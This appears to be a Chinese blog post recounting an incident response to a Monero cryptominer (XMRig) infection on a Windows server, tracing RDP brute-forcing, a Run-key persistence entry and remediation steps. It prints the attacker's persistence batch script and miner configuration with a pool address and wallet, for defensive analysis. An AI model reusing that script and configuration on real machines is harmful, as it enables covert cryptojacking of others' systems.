实战复盘:从挖矿病毒入侵到应急响应的完整闭环(知攻善防实验室)

张开发
2026/4/13 14:36:23 15 分钟阅读

分享文章

实战复盘:从挖矿病毒入侵到应急响应的完整闭环(知攻善防实验室)
1. 从CPU异常告警到挖矿病毒定位那天下午3点27分运维群里的告警机器人突然炸出一串红色消息。我负责维护的某台业务服务器CPU使用率飙到98%持续超过15分钟。这种异常指标就像发烧病人的体温计直接戳中了我的职业敏感神经。连上服务器后我习惯性按下CtrlShiftEsc调出任务管理器。在进程选项卡里一个名为xmrig.exe的进程正贪婪吞噬着CPU资源。这个文件名对安全工程师来说就像看到通缉令上的惯犯——典型的门罗币挖矿程序。为了确认判断我快速执行了以下命令获取程序指纹certutil -hashfile C:\Windows\Temp\xmrig.exe MD5当屏幕上跳出a79d49f425f95e70ddf0c68c18abc564这串MD5值时我立即联想到威胁情报平台记录的恶意哈希库。更可疑的是这个进程的用户上下文竟是NT AUTHORITY\SYSTEM攻击者显然已经完成权限提升。2. 攻击路径的逆向工程2.1 日志里的爆破痕迹打开事件查看器在Windows日志→安全里筛选事件ID 4625登录失败记录。日志显示过去24小时内来自192.168.115.131的IP持续对Administrator账户发起密码爆破攻击攻击频率达到每分钟120次。通过时间轴对比首次成功登录记录事件ID 4624出现在爆破开始后2小时17分钟。特别值得注意的是攻击者使用的登录类型是8网络明文登录这直接指向了RDP服务的3389端口。在安全组配置界面上我看到这条规则允许任何IP访问TCP 3389简直是为攻击者敞开了大门。2.2 后门脚本的藏身之处使用Autoruns工具扫描启动项时一个标红的条目格外扎眼HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Value: SystemMaintain Data: C:\ProgramData\systems.bat这个批处理文件内容看似普通实则暗藏玄机echo off :loop start /min C:\Windows\Temp\xmrig.exe -c C:\Windows\Temp\config.json timeout 3600 goto loop通过计算其哈希值确认了恶意属性certutil -hashfile C:\ProgramData\systems.bat MD5 8414900f4c896964497c2cf6552ec4b93. 挖矿行为的深度分析3.1 矿池钱包追踪在xmrig同目录下的config.json文件中发现了关键配置段{ pools: [ { url: c3pool.org:443, user: 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y, keepalive: true } ] }通过区块链浏览器查询这个钱包地址发现其近30天已产生0.47 XMR约合85美元的收益。虽然金额不大但攻击者很可能同时在控制数百台这样的肉鸡。3.2 网络流量特征用Wireshark抓包分析发现挖矿程序会建立TLS连接至矿池域名其流量特征非常明显固定每60秒发送一次keepalive包数据包长度集中在256-512字节范围TLS握手阶段使用的加密套件包含ECDHE-RSA-AES256-GCM-SHA384这些特征后来被我们添加到IDS的检测规则中极大提高了同类威胁的发现效率。4. 标准化应急响应流程4.1 即时处置步骤隔离网络第一时间在防火墙上阻断该服务器所有出站连接保存证据创建内存转储文件使用dumpit.exe复制所有可疑文件终止进程使用Process Explorer强制结束xmrig.exe及相关进程清除持久化删除注册表启动项和计划任务4.2 根治措施重置所有域账户密码特别是Administrator账户关闭服务器3389端口对外暴露改为通过跳板机访问部署EDR解决方案设置针对CPU异常占用的动态阈值告警对所有员工进行钓鱼邮件识别培训因为RDP爆破往往始于信息收集阶段这次事件给我们最大的教训是安全防护不能只盯着高危漏洞像弱密码这种低级错误往往会造成更严重的后果。现在团队每周都会用BloodHound工具检查Active Directory中的攻击路径把防御战线前移才是应对挖矿病毒的长效机制。

更多文章